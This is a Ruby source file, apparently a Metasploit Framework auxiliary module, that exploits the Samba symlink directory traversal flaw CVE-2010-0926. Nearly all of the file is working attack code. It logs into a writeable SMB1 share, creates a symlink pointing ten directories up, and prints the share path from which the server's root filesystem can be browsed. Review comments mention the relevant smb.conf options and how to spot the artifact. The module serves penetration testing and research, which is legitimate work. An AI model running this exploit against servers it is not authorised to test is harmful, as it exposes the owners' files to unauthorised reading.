rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/smb/samba_symlink_traversal.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Auxiliary module for the Samba symlink directory traversal tracked as
# CVE-2010-0926 (see 'References' below).
#
# What the code does: it opens an SMB1 session, attaches to a writeable share
# and asks the server to create a symlink inside that share whose target is
# ten levels of "../".
#
# NOTE(review): the CVE is described upstream as arising from the combination
# of the `unix extensions` and `wide links` smb.conf options; the Samba
# advisory listed in 'References' is believed to recommend `wide links = no`.
# Confirm against that page before relying on it.
class MetasploitModule < Msf::Auxiliary

  # Mixins: the SMB client first (exploit mixins are expected to come first),
  # then the reporting helpers.
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Report

  # Short names for frequently referenced Rex SMB namespaces.
  SIMPLE = Rex::Proto::SMB::SimpleClient
  XCEPT = Rex::Proto::SMB::Exceptions
  CONST = Rex::Proto::SMB::Constants

  # Declares the module metadata and its two user-facing options.
  #
  # The 'Notes' entry records that the module is declared crash-safe and that
  # a run leaves indicators in logs and an artifact on disk.
  def initialize
    super(
      'Name' => 'Samba Symlink Directory Traversal',
      'Description' => %(
        This module exploits a directory traversal flaw in the Samba
        CIFS server. To exploit this flaw, a writeable share must be specified.
        The newly created directory will link to the root filesystem.
      ),
      'Author' => [
        'kcope', # http://lists.grok.org.uk/pipermail/full-disclosure/2010-February/072927.html
        'hdm' # metasploit module
      ],
      'References' => [
        ['CVE', '2010-0926'],
        ['OSVDB', '62145'],
        ['URL', 'http://www.samba.org/samba/news/symlink_attack.html']
      ],
      'License' => MSF_LICENSE,
      'Notes' => {
        'Stability' => [CRASH_SAFE],
        'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK],
        'Reliability' => []
      }
    )

    # SMBSHARE is required and has no default; SMBTARGET is required and
    # defaults to 'rootfs'.
    share_option = OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server'])
    target_option = OptString.new('SMBTARGET', [true, 'The name of the directory that should point to the root filesystem', 'rootfs'])
    register_options([share_option, target_option])

    # run always connects with versions: [1], so the protocol-version option
    # is withdrawn rather than left as a setting that has no effect here.
    deregister_options('SMB::ProtocolVersion')
  end

  # Connects over SMB1, logs in, attaches to SMBSHARE, then requests a symlink
  # named SMBTARGET pointing at "../" repeated ten times.
  #
  # No return value is used; progress is reported through print_status.
  # Nothing is rescued here, so a failure in any step propagates to the caller.
  def run
    print_status('Connecting to the server...')
    connect(versions: [1]) # SMB1 only
    smb_login

    share_name = datastore['SMBSHARE']
    share_unc = "\\\\#{rhost}\\#{share_name}"

    print_status("Trying to mount writeable share '#{share_name}'...")
    simple.connect(share_unc)

    link_name = datastore['SMBTARGET']
    parent_hops = '../' * 10

    print_status("Trying to link '#{link_name}' to the root filesystem...")
    # NOTE(review): presumably this link is the on-disk artifact declared in
    # 'Notes'; a symlink inside a writeable share that resolves outside the
    # share root is what to look for when auditing a server. Confirm.
    simple.client.symlink(link_name, parent_hops)

    print_status('Now access the following share to browse the root filesystem:')
    print_status("\t#{share_unc}\\#{link_name}\\")
    print_line('')
  end
end